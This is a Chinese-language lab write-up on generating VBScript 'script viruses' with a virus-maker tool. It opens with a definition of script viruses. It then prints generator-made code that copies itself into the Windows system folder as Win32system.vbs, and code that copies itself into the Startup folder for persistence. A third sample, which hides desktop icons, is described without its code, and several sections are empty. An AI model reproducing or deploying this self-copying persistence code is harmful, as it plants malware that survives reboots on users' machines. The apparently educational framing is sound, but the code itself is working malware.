利用“病毒制造机”实现脚本病毒的制造

一、脚本病毒的概念：

      脚本病毒通常是 JavaScript 或 VBScript 等语言编写的恶意代码，一般广告性质，会修改 IE 首页、修改注册表等信息，对用户计算机造成破坏。 通过网页进行的传播的病毒较为典型，脚本病毒还会有如下前缀：VBS、JS(表明是何种脚本编写的)，如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)、红色代码(Script.Redlof)等。一般具有传播性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性等不良特性；其生命周期一般为开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。

二、实践3种不同功能的脚本病毒:

1.将一个Win32system的vbs文件写入system32系统文件夹中：

(1)利用病毒生成器生成的这个vbs病毒代码如下：

On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\Win32system.vbs")

(2)带注释的版本:

(3)效果:

 

2. 写入到开始菜单中的版本:

On Error Resume Next

set fso = createobject("scripting.filesystemobject") 
set ws = createobject("wscript.shell")
pt=ws.specialfolders("startup")&"\"
set file = fso.getfile(wscript.scriptfullname)
file.copy pt

Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\启动\Win32system.vbs")

（2）带注释的版本:

(3)效果，反正我没有成功，

不过借用了 上面那个它另外给的代码后，在开启菜单中出现了这个vbs文件本身的副本

3.禁用桌面所有图标的版本

（1）生成的代码：

（2）带注释的版本：

(3)效果：

桌边的所有图标都不能显示了，但是开始菜单还是可以打开的